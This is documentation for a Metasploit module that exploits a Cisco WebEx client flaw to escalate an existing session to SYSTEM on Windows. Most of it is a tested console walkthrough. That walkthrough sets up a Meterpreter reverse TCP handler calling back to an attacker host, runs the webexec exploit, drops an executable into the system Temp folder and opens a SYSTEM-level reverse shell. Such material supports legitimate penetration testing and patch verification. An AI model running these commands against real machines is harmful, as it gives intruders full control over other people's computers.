## Description This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found in Cisco's WebEx client software for versions below v33.6.0.655. ## Vulnerable Application Cisco WebEx v33.3.8.7 and below ## Verification Steps 1. Install the application 2. Start msfconsole 3. Get a session 4. Do: ```use exploit/windows/local/webexec``` 5. Do: ```set SESSION ``` 6. Do: ```run``` 7. You should get an elevated session. ## Scenarios ### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86 ``` msf5 > use multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.136 [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500 meterpreter > getuid Server username: WIN-MGMN7ND70I1\a_user meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use exploit/windows/local/webexec msf5 exploit(windows/local/webexec) > set session 1 session => 1 msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 msf5 exploit(windows/local/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking service exists... [*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe... [*] Launching service... [*] Sending stage (179779 bytes) to 192.168.37.136 [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500 [*] Service started... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ```